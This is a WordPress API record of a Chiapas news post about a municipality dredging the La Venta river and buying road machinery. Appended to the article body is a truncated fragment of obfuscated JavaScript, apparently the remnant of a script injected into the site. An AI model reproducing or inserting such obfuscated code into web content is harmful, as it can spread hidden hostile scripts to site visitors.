{"id":483,"date":"2022-03-11T03:59:06","date_gmt":"2022-03-11T03:59:06","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=483"},"modified":"2022-03-11T03:59:08","modified_gmt":"2022-03-11T03:59:08","slug":"para-prevenir-inundaciones-futuras-ayuntamiento-da-inicio-al-desasolve-del-rio-la-venta-en-jiquipilas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=483","title":{"rendered":"Para prevenir inundaciones futuras, Ayuntamiento da inicio al desasolve del r\u00edo La Venta, en Jiquipilas."},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"681\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220310-WA0034-1024x681.jpg\" alt=\"\" class=\"wp-image-484\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220310-WA0034-1024x681.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220310-WA0034-300x199.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220310-WA0034-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220310-WA0034-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220310-WA0034.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><figcaption>De<\/figcaption><\/figure>\n\n\n\n<p>\u2022 Con recursos propios el gobierno municipal adquiri\u00f3 un Tractor D-6 y una Motoconformadora para reducir gastos p\u00fablicos y facilitar trabajos para el municipio.<\/p>\n\n\n\n<p>\u2022 El edil Jiquipilteco agradeci\u00f3 el apoyo y respaldo del Gobernador Rutilio Escand\u00f3n Cadenas y del Secretario de Protecci\u00f3n Civil del Estado, Luis Manuel Garc\u00eda Moreno.<\/p>\n\n\n\n<p>Jiquipilas, Chiapas. &#8211; Dando pronta atenci\u00f3n a peticiones a\u00f1ejas y que en temporadas de lluvias generan riesgo a quienes habitan en los m\u00e1rgenes del rio la venta, autoridades Jiquipiltecas dieron el banderazo de inicio al desazolve del per\u00edmetro del rio La Venta, en los tramos de la cintal al puente el manguito.<\/p>\n\n\n\n<p>Siguiendo los protocolos de prevenci\u00f3n de la Secretar\u00eda de Protecci\u00f3n Civil del Estado, se realizan los trabajos que benefician la integridad de las familias que habitan en la zona y son afectados por el desborde del rio en temporadas de lluvia, por lo que actuar con anticipaci\u00f3n es un m\u00e9todo efectivo que proyecta grandes beneficios a la integridad y seguridad de los pobladores.<\/p>\n\n\n\n<p>El mun\u00edcipe recalc\u00f3 que con anterioridad la ciudadan\u00eda demandaba la actuaci\u00f3n de esta actividad, la cu\u00e1l se ha dejado de hacer y que debido al aumento poblacional y a la expansi\u00f3n de territorio, hogares son da\u00f1ados fuertemente, lo que puede prevenirse planificando un recorrido pluvial sin obstrucciones de material s\u00f3lido.<\/p>\n\n\n\n<p>Estos trabajos son de gran beneficio, generando una barrera en diferentes \u00e1reas y facilitando la corriente pluvial; los cuales estar\u00e1n de manera continua por lo que se ha pedido el apoyo de la sociedad en liberar cercas y alambrados dentro del \u00e1rea del rio, en peticiones que la misma ciudadan\u00eda emite.<\/p>\n\n\n\n<p>El Gobierno Municipal inform\u00f3 que con recursos propios se adquiri\u00f3 un tractor D-6 y una Motoconformadora con lo que reducir\u00e1n los gastos al herario p\u00fablico y se podr\u00e1n mantener los caminos en mejores condiciones.<\/p>\n\n\n\n<p>Atestig\u00fcaron el acto Hermes Escand\u00f3n Vleeschower, coordinador de delegados regionales y Guillermo Soto Palomeque, delegado regional de la Secretar\u00eda de Protecci\u00f3n Civil del Estado, adem\u00e1s de autoridades ejidales del municipio.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>De \u2022 Con recursos propios el gobierno municipal adquiri\u00f3 un Tractor D-6 y una Motoconformadora para reducir gastos p\u00fablicos y facilitar trabajos para el municipio. \u2022 El edil Jiquipilteco agradeci\u00f3 el apoyo y respaldo del Gobernador Rutilio Escand\u00f3n Cadenas y del Secretario de Protecci\u00f3n Civil del Estado, Luis Manuel Garc\u00eda Moreno. Jiquipilas, Chiapas. &#8211; Dando &hellip;<\/p>\n","protected":false},"author":2,"featured_media":484,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-483","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/483","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=483"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/483\/revisions"}],"predecessor-version":[{"id":485,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/483\/revisions\/485"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/484"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=483"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=483"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=483"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}